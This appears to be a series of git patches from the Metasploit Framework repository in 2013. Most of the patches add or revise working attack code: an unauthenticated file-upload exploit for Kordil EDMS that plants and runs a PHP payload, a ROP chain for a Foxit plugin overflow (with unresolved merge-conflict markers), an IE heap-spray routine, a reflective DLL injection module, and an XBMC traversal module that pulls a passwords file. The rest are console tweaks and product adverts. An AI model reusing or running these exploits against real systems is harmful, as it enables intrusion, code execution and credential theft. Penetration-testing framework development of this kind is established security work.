| - html += %Q|| - html += %Q|| + html = <<-EOF + + + + EOF return html end From f04df6300a916cd77c6f99d0680a0960a3dbfcdb Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 21 Feb 2013 13:44:37 +0100 Subject: [PATCH 042/139] makefile updated --- external/source/exploits/cve-2013-0431/Makefile | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/external/source/exploits/cve-2013-0431/Makefile b/external/source/exploits/cve-2013-0431/Makefile index 7c77a9c3b4..43045c9e5a 100644 --- a/external/source/exploits/cve-2013-0431/Makefile +++ b/external/source/exploits/cve-2013-0431/Makefile @@ -2,17 +2,21 @@ CLASSES = \ Exploit.java \ - B.java + B.java \ + Serializer.java .SUFFIXES: .java .class .java.class: - javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java + javac -source 1.2 -target 1.2 -cp "../../../../data/java:." $*.java all: $(CLASSES:.java=.class) install: + java Serializer mv Exploit.class ../../../../data/exploits/cve-2013-0431/ mv B.class ../../../../data/exploits/cve-2013-0431/ + mv Exploit.ser ../../../../data/exploits/cve-2013-0431/ clean: rm -rf *.class + rm -rf *.ser From e5e47a34851912b24e7974549918e06735f26593 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 21 Feb 2013 10:10:39 -0600 Subject: [PATCH 043/139] Bleh, I fucked up this file --- .../browser/foxit_reader_plugin_url_bof.rb | 31 ------------------- 1 file changed, 31 deletions(-) diff --git a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb index fd2d342952..79df79fbcf 100644 --- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb +++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb @@ -96,46 +96,16 @@ class Metasploit3 < Msf::Exploit::Remote return rand_text_alpha(4).unpack("L")[0].to_i end -<<<<<<< HEAD -======= def nops make_nops(4).unpack("N*") end ->>>>>>> ee707904b08d61c2cb240ef8d052fef9e3d2c87d # Uses rop chain from npFoxitReaderPlugin.dll (foxit) (no ASLR module) def win7_rop_chain # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ -<<<<<<< HEAD - 0x1000ce1a, # POP EAX # RETN [npFoxitReaderPlugin.dll] - 0x100361a8, # ptr to &VirtualAlloc() [IAT npFoxitReaderPlugin.dll] - 0x1000f055, # MOV EAX,DWORD PTR DS:[EAX] # RETN [npFoxitReaderPlugin.dll] - 0x10021081, # PUSH EAX # POP ESI # RETN 0x04 [npFoxitReaderPlugin.dll] - 0x10007971, # POP EBP # RETN [npFoxitReaderPlugin.dll] - junk, # Filler (RETN offset compensation) - 0x1000614c, # & push esp # ret [npFoxitReaderPlugin.dll] - 0x100073fa, # POP EBX # RETN [npFoxitReaderPlugin.dll] - 0x00001000, # 0x00001000-> edx - 0x1000d9ec, # XOR EDX, EDX # RETN - 0x1000d9be, # ADD EDX,EBX # POP EBX # RETN 0x10 [npFoxitReaderPlugin.dll] - jun, # Filler (compensate) - 0x100074a7, # POP ECX # RETN [npFoxitReaderPlugin.dll] - junk, # Filler (RETN offset compensation) - junk, # Filler (RETN offset compensation) - junk, # Filler (RETN offset compensation) - junk, # Filler (RETN offset compensation) - 0x00000040, # 0x00000040-> ecx - 0x1000e4ab, # POP EBX # RETN [npFoxitReaderPlugin.dll] - 0x00000001, # 0x00000001-> ebx - 0x1000dc86, # POP EDI # RETN [npFoxitReaderPlugin.dll] - 0x1000eb81, # RETN (ROP NOP) [npFoxitReaderPlugin.dll] - 0x1000c57d, # POP EAX # RETN [npFoxitReaderPlugin.dll] - 0x90909090, # nop - 0x10005638, # PUSHAD # RETN [npFoxitReaderPlugin.dll] -======= 0x1000ce1a, # POP EAX # RETN [npFoxitReaderPlugin.dll] 0x100361a8, # ptr to &VirtualAlloc() [IAT npFoxitReaderPlugin.dll] 0x1000f055, # MOV EAX,DWORD PTR DS:[EAX] # RETN [npFoxitReaderPlugin.dll] @@ -161,7 +131,6 @@ class Metasploit3 < Msf::Exploit::Remote 0x1000c57d, # POP EAX # RETN [npFoxitReaderPlugin.dll] nops, 0x10005638, # PUSHAD # RETN [npFoxitReaderPlugin.dll] ->>>>>>> ee707904b08d61c2cb240ef8d052fef9e3d2c87d ].flatten.pack("V*") return rop_gadgets From 4784db3403bfefaa8e83e38c8d70cabf99f372d0 Mon Sep 17 00:00:00 2001 From: Matt Andreko Date: Thu, 21 Feb 2013 15:48:41 -0500 Subject: [PATCH 044/139] Fixed name --- modules/auxiliary/scanner/http/xbmc_traversal.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/xbmc_traversal.rb b/modules/auxiliary/scanner/http/xbmc_traversal.rb index 2f43b36077..099b8f28a9 100644 --- a/modules/auxiliary/scanner/http/xbmc_traversal.rb +++ b/modules/auxiliary/scanner/http/xbmc_traversal.rb @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary [ 'sinn3r', # Used sinn3r's yaws_traversal exploit as a skeleton 'Lucas "acidgen" Lundgren IOActive', - 'Matt "hostess" Andreko', + 'Matt "hostess" Andreko ' ], 'References' => [ From b4f002d080642ad98b44322cb026c017ab52e6cd Mon Sep 17 00:00:00 2001 From: Matt Andreko Date: Thu, 21 Feb 2013 16:55:27 -0500 Subject: [PATCH 045/139] Code Review Feedback Modified USER and PASS to USERNAME and PASSWORD Moved the Scanner mixin to the bottom and removed deregister --- modules/auxiliary/scanner/http/xbmc_traversal.rb | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/scanner/http/xbmc_traversal.rb b/modules/auxiliary/scanner/http/xbmc_traversal.rb index 099b8f28a9..561f91c892 100644 --- a/modules/auxiliary/scanner/http/xbmc_traversal.rb +++ b/modules/auxiliary/scanner/http/xbmc_traversal.rb @@ -9,9 +9,9 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner def initialize(info={}) super(update_info(info, @@ -41,11 +41,9 @@ class Metasploit3 < Msf::Auxiliary Opt::RPORT(8080), OptString.new('FILEPATH', [false, 'The name of the file to download', '/private/var/mobile/Library/Preferences/XBMC/userdata/passwords.xml']), OptInt.new('DEPTH', [true, 'The max traversal depth', 9]), - OptString.new('USER', [true, 'The username to use for the HTTP server', 'xbmc']), - OptString.new('PASS', [true, 'The password to use for the HTTP server', 'xbmc']), + OptString.new('USERNAME', [true, 'The username to use for the HTTP server', 'xbmc']), + OptString.new('PASSWORD', [true, 'The password to use for the HTTP server', 'xbmc']), ], self.class) - - deregister_options('RHOST') end def run_host(ip) From 002654317ce99555dcf6298a543f6a4d94970398 Mon Sep 17 00:00:00 2001 From: bcoles Date: Fri, 22 Feb 2013 23:32:17 +1030 Subject: [PATCH 046/139] Add Kordil EDMS File Upload Vulnerability exploit --- .../multi/http/kordil-edms-upload-exec.rb | 137 ++++++++++++++++++ 1 file changed, 137 insertions(+) create mode 100644 modules/exploits/multi/http/kordil-edms-upload-exec.rb diff --git a/modules/exploits/multi/http/kordil-edms-upload-exec.rb b/modules/exploits/multi/http/kordil-edms-upload-exec.rb new file mode 100644 index 0000000000..d4caccb78b --- /dev/null +++ b/modules/exploits/multi/http/kordil-edms-upload-exec.rb @@ -0,0 +1,137 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability", + 'Description' => %q{ + This module exploits a vulnerability in Kordil EDMS v2.2.60rc3. + This application has an upload feature that allows an unauthenticated user + to upload arbitrary files to the '/kordil_edms/userpictures/' directory. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Brendan Coles ' # Discovery and exploit + ], + 'References' => + [ + #['OSVDB', ''], + #['EDB', ''], + ], + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => + [ + ['Automatic Targeting', { 'auto' => true }] + ], + 'Privileged' => false, + 'DisclosureDate' => "Feb 22 2013", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The path to the web application', '/kordil_edms/']), + ], self.class) + end + + def check + + base = target_uri.path + base << '/' if base[-1, 1] != '/' + peer = "#{rhost}:#{rport}" + + # retrieve software version from login page + begin + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "#{base}global_group_login.php" + }) + if res and res.code == 200 + if res.body =~ /
Kordil EDMS v2\.2\.60/ + return Exploit::CheckCode::Vulnerable + elsif res.body =~ /Kordil EDMS v/ + return Exploit::CheckCode::Detected + end + end + return Exploit::CheckCode::Safe + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + print_error("#{peer} - Connection failed") + end + return Exploit::CheckCode::Unknown + + end + + def upload(base, file) + data = Rex::MIME::Message.new + data.add_part(file, 'text/x-php', nil, "form-data; name=\"upload_fd31\"; filename=\"#{@fname}.php\"") + data.add_part("#{@fname}", nil, nil, 'form-data; name="add_fd0"') + data.add_part("#{@fname}", nil, nil, 'form-data; name="add_fd27"') + data.add_part("n", nil, nil, 'form-data; name="act"') + data_post = data.to_s + data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{base}users_add.php", + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => data_post + }) + return res + end + + def on_new_session(client) + if client.type == "meterpreter" + client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") + client.fs.file.rm("#{@fname}.php") + else + client.shell_command_token("rm #{@fname}.php") + end + end + + + def exploit + + base = target_uri.path + base << '/' if base[-1, 1] != '/' + @peer = "#{rhost}:#{rport}" + @fname = rand_text_numeric(7) + + # upload PHP payload to userpictures/[fname].php + print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") + php = %Q|| + begin + res = upload(base, php) + if res and res.code == 302 and res.headers['Location'] =~ /\.\/user_account\.php\?/ + print_good("#{@peer} - File uploaded successfully") + else + fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed") + end + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") + end + + # retrieve and execute PHP payload + print_status("#{@peer} - Executing payload (userpictures/#{@fname}.php)") + begin + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "#{base}userpictures/#{@fname}.php" + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") + end + + end +end From 56fa5ead37cb1be772290423ed9c8ec8de889d62 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 22 Feb 2013 10:21:20 -0600 Subject: [PATCH 047/139] Initial version of js_property_spray --- lib/msf/core/exploit/http/server.rb | 52 +++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 326ae2fd6a..3afeb25000 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -792,6 +792,58 @@ protected return js end + # + # This heap spray technique takes advantage of MSHTML's SetStringProperty (or SetProperty) + # function to trigger allocations by ntdll!RtlAllocateHeap. It is based on Corelan's + # publication on "DEPS – Precise Heap Spray on Firefox and IE10". + # + def js_property_spray + js = %Q|function sprayHeap(shellcode, browser, offset, heapBlockSize, maxAllocs) { + if (offset == undefined) { offset = 0x104; } + if (heapBlockSize == undefined) { heapBlockSize = 0x40000; } + if (maxAllocs == undefined) { maxAllocs = 500; } + if (browser == undefined) { browser = 'generic'; } + + var div_container = document.createElement("div"); + div_container.style.cssText = "display:none"; + var data; + junk = unescape("%u2020%u2020"); + while (junk.length < 0x1000) junk += junk; + + data = junk.substring(0,offset) + shellcode; + data += junk.substring(0,0x800-offset-shellcode.length); + + while (data.length < 0x80000) data += data; + + for (var i = 0; i < maxAllocs; i++) + { + var obj = document.createElement("button"); + switch (browser) + { + case 'ie8': + obj.title = data.substring(0,(heapBlockSize-0x58)/2); + div_container.appendChild(obj); + break; + + case 'ie9': + obj.title = data.substring(0,(heapBlockSize-2)/2); + div_container.appendChild(obj); + break; + + case 'ie10': + obj.title = data.substring(0,(heapBlockSize-2/2) / 2); + div_container.appendChild(obj); + break; + + default: + obj.title = data.substring(0, heapBlockSize); + div_container.appendChild(obj); + } + } + } + | + end + def js_heap_spray js = %Q|var memory = new Array(); function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) { From 0ea7247a43713b10fe8ec8fe65661eb332b134d9 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 22 Feb 2013 22:05:29 +0000 Subject: [PATCH 048/139] Initial commit --- .../windows/manage/reflective_dll_inject.rb | 98 +++++++++++++++++++ 1 file changed, 98 insertions(+) create mode 100644 modules/post/windows/manage/reflective_dll_inject.rb diff --git a/modules/post/windows/manage/reflective_dll_inject.rb b/modules/post/windows/manage/reflective_dll_inject.rb new file mode 100644 index 0000000000..15e0492006 --- /dev/null +++ b/modules/post/windows/manage/reflective_dll_inject.rb @@ -0,0 +1,98 @@ +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' + +class Metasploit3 < Msf::Post + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Windows Manage Reflective DLL Injection Module', + 'Description' => %q{ + This module will inject into the memory of a process a specified Reflective DLL. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Ben Campbell '], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'References' => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ] + )) + + register_options( + [ + OptPath.new('PATH',[true, 'Reflective DLL to inject into memory of a process.']), + OptInt.new('PID',[true, 'Process Identifier to inject of process to inject payload.']), + ], self.class) + end + + # Run Method for when run command is issued + def run + # syinfo is only on meterpreter sessions + print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? + + dll = '' + offset = nil + begin + File.open( datastore['PATH'], "rb" ) { |f| dll += f.read(f.stat.size) } + + pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) ) + + pe.exports.entries.each do |entry| + if( entry.name =~ /^\S*ReflectiveLoader\S*/ ) + offset = pe.rva_to_file_offset( entry.rva ) + break + end + end + + raise "Can't find an exported ReflectiveLoader function!" if offset == 0 + rescue + print_error( "Failed to read and parse Dll file: #{$!}" ) + return + end + + inject_into_pid(dll, datastore['PID'], offset) + end + + def inject_into_pid(pay, pid, offset) + + if offset.nil? + print_error("Reflective Loader offset is nil.") + return + end + + if pay.nil? or pay.empty? + print_error("Invalid DLL.") + return + end + + if pid.nil? or pid == 0 + print_error("Invalid PID.") + return + end + + print_status("Injecting #{datastore['DLL_PATH']} into process ID #{pid}") + begin + print_status("Opening process #{pid}") + host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS) + print_status("Generating payload") + print_status("Allocating memory in procees #{pid}") + mem = host_process.memory.allocate(pay.length + (pay.length % 1024)) + # Ensure memory is set for execution + host_process.memory.protect(mem) + print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{pay.length} bytes") + print_status("Writing the stager into memory...") + host_process.memory.write(mem, pay) + host_process.thread.create(mem+offset, 0) + print_good("Successfully injected payload in to process: #{pid}") + rescue ::Exception => e + print_error("Failed to Inject Payload to #{pid}!") + print_error(e.to_s) + end + end +end + From 15d505f7a9b4367f08a8d1592846f8e00d3a4bf1 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 22 Feb 2013 22:09:19 +0000 Subject: [PATCH 049/139] Msftidy --- .../windows/manage/reflective_dll_inject.rb | 44 +++++++++---------- 1 file changed, 22 insertions(+), 22 deletions(-) diff --git a/modules/post/windows/manage/reflective_dll_inject.rb b/modules/post/windows/manage/reflective_dll_inject.rb index 15e0492006..ac7d447afe 100644 --- a/modules/post/windows/manage/reflective_dll_inject.rb +++ b/modules/post/windows/manage/reflective_dll_inject.rb @@ -12,15 +12,15 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, - 'Name' => 'Windows Manage Reflective DLL Injection Module', - 'Description' => %q{ + 'Name' => 'Windows Manage Reflective DLL Injection Module', + 'Description' => %q{ This module will inject into the memory of a process a specified Reflective DLL. }, - 'License' => MSF_LICENSE, - 'Author' => [ 'Ben Campbell '], - 'Platform' => [ 'win' ], - 'SessionTypes' => [ 'meterpreter' ], - 'References' => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ] + 'License' => MSF_LICENSE, + 'Author' => [ 'Ben Campbell '], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'References' => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ] )) register_options( @@ -37,23 +37,23 @@ class Metasploit3 < Msf::Post dll = '' offset = nil - begin - File.open( datastore['PATH'], "rb" ) { |f| dll += f.read(f.stat.size) } + begin + File.open( datastore['PATH'], "rb" ) { |f| dll += f.read(f.stat.size) } - pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) ) + pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) ) - pe.exports.entries.each do |entry| - if( entry.name =~ /^\S*ReflectiveLoader\S*/ ) - offset = pe.rva_to_file_offset( entry.rva ) - break - end - end + pe.exports.entries.each do |entry| + if( entry.name =~ /^\S*ReflectiveLoader\S*/ ) + offset = pe.rva_to_file_offset( entry.rva ) + break + end + end - raise "Can't find an exported ReflectiveLoader function!" if offset == 0 - rescue - print_error( "Failed to read and parse Dll file: #{$!}" ) - return - end + raise "Can't find an exported ReflectiveLoader function!" if offset == 0 + rescue + print_error( "Failed to read and parse Dll file: #{$!}" ) + return + end inject_into_pid(dll, datastore['PID'], offset) end @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Post print_error("Invalid PID.") return end - + print_status("Injecting #{datastore['DLL_PATH']} into process ID #{pid}") begin print_status("Opening process #{pid}") From aa007b9e0ab4a873075427bfd733d6787ca750f7 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 22 Feb 2013 20:07:16 -0600 Subject: [PATCH 050/139] Updates --- lib/msf/core/exploit/http/server.rb | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 3afeb25000..5fdfaf77ff 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -795,10 +795,10 @@ protected # # This heap spray technique takes advantage of MSHTML's SetStringProperty (or SetProperty) # function to trigger allocations by ntdll!RtlAllocateHeap. It is based on Corelan's - # publication on "DEPS – Precise Heap Spray on Firefox and IE10". + # publication on "DEPS – Precise Heap Spray on Firefox and IE10" # def js_property_spray - js = %Q|function sprayHeap(shellcode, browser, offset, heapBlockSize, maxAllocs) { + js = %Q|function sprayHeap(shellcode, browser, heapBlockSize, offset , maxAllocs) { if (offset == undefined) { offset = 0x104; } if (heapBlockSize == undefined) { heapBlockSize = 0x40000; } if (maxAllocs == undefined) { maxAllocs = 500; } @@ -808,7 +808,7 @@ protected div_container.style.cssText = "display:none"; var data; junk = unescape("%u2020%u2020"); - while (junk.length < 0x1000) junk += junk; + while (junk.length < offset+0x1000) junk += junk; data = junk.substring(0,offset) + shellcode; data += junk.substring(0,0x800-offset-shellcode.length); @@ -821,7 +821,7 @@ protected switch (browser) { case 'ie8': - obj.title = data.substring(0,(heapBlockSize-0x58)/2); + obj.title = data.substring(0,(heapBlockSize-6)/2); div_container.appendChild(obj); break; @@ -835,9 +835,13 @@ protected div_container.appendChild(obj); break; - default: + case 'generic': obj.title = data.substring(0, heapBlockSize); div_container.appendChild(obj); + break; + + default: + throw "Invalid argument"; } } } From 7509501b18d3ba4aacb34d168da905c0ad74e6fc Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Sat, 23 Feb 2013 08:46:51 -0600 Subject: [PATCH 051/139] Adding a go_pro command --- lib/msf/ui/console/command_dispatcher/core.rb | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index b1deb09058..2a7abf765b 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -68,6 +68,9 @@ class Core @@search_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help banner." ]) + @@go_pro_opts = Rex::Parser::Arguments.new( + "-h" => [ false, "Help banner." ]) + # The list of data store elements that cannot be set when in defanged # mode. DefangedProhibitedDataStoreElements = [ "MsfModulePaths" ] @@ -82,6 +85,7 @@ class Core "connect" => "Communicate with a host", "color" => "Toggle color", "exit" => "Exit the console", + "go_pro" => "Launch Metasploit web UI", "help" => "Help menu", "info" => "Displays information about one or more module", "irb" => "Drop into irb scripting mode", @@ -2575,6 +2579,17 @@ class Core return res end + def cmd_go_pro_help + print_line "Usage: go_pro" + print_line + print_line "Launch the Metasploit web UI" + print_line + end + + def cmd_go_pro(*args) + print_line "Hey now it's pro time" + end + protected # From 67c2c3da205a39a73a3c7981facc60105aa2ffee Mon Sep 17 00:00:00 2001 From: Matt Andreko Date: Sat, 23 Feb 2013 10:09:23 -0500 Subject: [PATCH 052/139] Code Review Feedback Fixed the USER/PASS that I missed in last review Converted from Scanner module to Gather --- .../auxiliary/{scanner/http => gather}/xbmc_traversal.rb | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) rename modules/auxiliary/{scanner/http => gather}/xbmc_traversal.rb (95%) diff --git a/modules/auxiliary/scanner/http/xbmc_traversal.rb b/modules/auxiliary/gather/xbmc_traversal.rb similarity index 95% rename from modules/auxiliary/scanner/http/xbmc_traversal.rb rename to modules/auxiliary/gather/xbmc_traversal.rb index 561f91c892..55c4a76a68 100644 --- a/modules/auxiliary/scanner/http/xbmc_traversal.rb +++ b/modules/auxiliary/gather/xbmc_traversal.rb @@ -11,7 +11,6 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::Scanner def initialize(info={}) super(update_info(info, @@ -46,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary ], self.class) end - def run_host(ip) + def run # No point to continue if no filename is specified if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty? print_error("Please supply the name of the file you want to download") @@ -58,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_raw({ 'method' => 'GET', 'uri' => "/#{traversal}/#{datastore['FILEPATH']}", - 'basic_auth' => "#{datastore['USER']}:#{datastore['PASS']}" + 'basic_auth' => "#{datastore['USERNAME']}:#{datastore['PASSWORD']}" }, 25) # Show data if needed @@ -70,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary path = store_loot( 'xbmc.http', 'application/octet-stream', - ip, + datastore['RHOST'], res.body, fname ) From 2af930f1ff45e27f6fe1b684ecf8634b5cd7139b Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Sat, 23 Feb 2013 09:19:27 -0600 Subject: [PATCH 053/139] Adds msfbase_dir, switches on apt existance --- lib/msf/ui/console/command_dispatcher/core.rb | 34 +++++++++++++++++-- 1 file changed, 31 insertions(+), 3 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 2a7abf765b..9390939b03 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -85,7 +85,7 @@ class Core "connect" => "Communicate with a host", "color" => "Toggle color", "exit" => "Exit the console", - "go_pro" => "Launch Metasploit web UI", + "go_pro" => "Launch Metasploit web GUI", "help" => "Help menu", "info" => "Displays information about one or more module", "irb" => "Drop into irb scripting mode", @@ -137,6 +137,17 @@ class Core "Core" end + # Indicates the base dir where Metasploit Framework is installed. + def msfbase_dir + base = __FILE__ + while File.symlink?(base) + base = File.expand_path(File.readlink(base), File.dirname(base)) + end + File.expand_path( + File.join(File.dirname(base), "..","..","..","..","..") + ) + end + def cmd_color_help print_line "Usage: color <'true'|'false'|'auto'>" print_line @@ -2582,12 +2593,29 @@ class Core def cmd_go_pro_help print_line "Usage: go_pro" print_line - print_line "Launch the Metasploit web UI" + print_line "Launch the Metasploit web GUI" print_line end def cmd_go_pro(*args) - print_line "Hey now it's pro time" + unless is_apt + print_line " This command is only available on apt-based installations," + print_line " such as Kali Linux." + return false + end + @@go_pro_opts.parse(args) do |opt, idx, val| + case opt + when "-h" + cmd_go_pro_help + return false + end + end + return true + end + + # Determines if this is an apt-based install + def is_apt + File.exists?(File.expand_path(File.join(msfbase_dir, '.apt'))) end protected From b221711ecdfed5d0648df1515657236dfef8efad Mon Sep 17 00:00:00 2001 From: Matt Andreko Date: Sat, 23 Feb 2013 10:24:04 -0500 Subject: [PATCH 054/139] Added basic error handling --- modules/auxiliary/gather/xbmc_traversal.rb | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/gather/xbmc_traversal.rb b/modules/auxiliary/gather/xbmc_traversal.rb index 55c4a76a68..78124aaa1a 100644 --- a/modules/auxiliary/gather/xbmc_traversal.rb +++ b/modules/auxiliary/gather/xbmc_traversal.rb @@ -54,11 +54,16 @@ class Metasploit3 < Msf::Auxiliary # Create request traversal = "../" * datastore['DEPTH'] #The longest of all platforms tested was 9 deep - res = send_request_raw({ - 'method' => 'GET', - 'uri' => "/#{traversal}/#{datastore['FILEPATH']}", - 'basic_auth' => "#{datastore['USERNAME']}:#{datastore['PASSWORD']}" - }, 25) + begin + res = send_request_raw({ + 'method' => 'GET', + 'uri' => "/#{traversal}/#{datastore['FILEPATH']}", + 'basic_auth' => "#{datastore['USERNAME']}:#{datastore['PASSWORD']}" + }, 25) + rescue Rex::ConnectionRefused + print_error("#{rhost}:#{rport} Could not connect.") + return + end # Show data if needed if res From 90a1dcffa3dcb397577d32cb6191eab12f7bb788 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Sat, 23 Feb 2013 09:36:06 -0600 Subject: [PATCH 055/139] Adds a random banner offering go_pro --- lib/msf/ui/console/command_dispatcher/core.rb | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 9390939b03..24cfebf867 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -355,6 +355,20 @@ class Core # def cmd_banner(*args) banner = "%cya" + Banner.to_s + "%clr\n\n" + + if is_apt + content = [ + "Large pentest? List, sort, group, tag and search your hosts and services\nin Metasploit Pro -- type ‘go_pro’ to launch it now.", + "Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with\nMetasploit Pro -- type ‘go_pro’ to launch it now.", + "Save your shells from AV! Upgrade to advanced AV evasion using dynamic\nexe templates with Metasploit Pro -- type ‘go_pro’ to launch it now.", + "Easy phishing: Set up email templates, landing pages and listeners\nin Metasploit Pro’s wizard -- type ‘go_pro’ to launch it now.", + "Using notepad to track pentests? Have Metasploit Pro report on hosts,\nservices, sessions and evidence -- type ‘go_pro’ to launch it now.", + "Tired of typing ‘set RHOSTS’? Click & pwn with Metasploit Pro\n-- type ‘go_pro’ to launch it now." + ] + banner << content.sample + banner << "\n\n" + end + banner << " =[ %yelmetasploit v#{Msf::Framework::Version} [core:#{Msf::Framework::VersionCore} api:#{Msf::Framework::VersionAPI}]%clr\n" banner << "+ -- --=[ " banner << "#{framework.stats.num_exploits} exploits - #{framework.stats.num_auxiliary} auxiliary - #{framework.stats.num_post} post\n" @@ -362,6 +376,7 @@ class Core oldwarn = nil avdwarn = nil + banner << "#{framework.stats.num_payloads} payloads - #{framework.stats.num_encoders} encoders - #{framework.stats.num_nops} nops\n" if ( ::Msf::Framework::RepoRevision.to_i > 0 and ::Msf::Framework::RepoUpdatedDate) tstamp = ::Msf::Framework::RepoUpdatedDate.strftime("%Y.%m.%d") From b80343817ce30e9d92f17ec347bb577847720a55 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Sat, 23 Feb 2013 09:48:18 -0600 Subject: [PATCH 056/139] Skeleton for acutally go_pro'ing --- lib/msf/ui/console/command_dispatcher/core.rb | 31 +++++++++++++++++-- 1 file changed, 29 insertions(+), 2 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 24cfebf867..e80b3ffdd5 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -365,7 +365,7 @@ class Core "Using notepad to track pentests? Have Metasploit Pro report on hosts,\nservices, sessions and evidence -- type ‘go_pro’ to launch it now.", "Tired of typing ‘set RHOSTS’? Click & pwn with Metasploit Pro\n-- type ‘go_pro’ to launch it now." ] - banner << content.sample + banner << content.sample # Ruby 1.9-ism! banner << "\n\n" end @@ 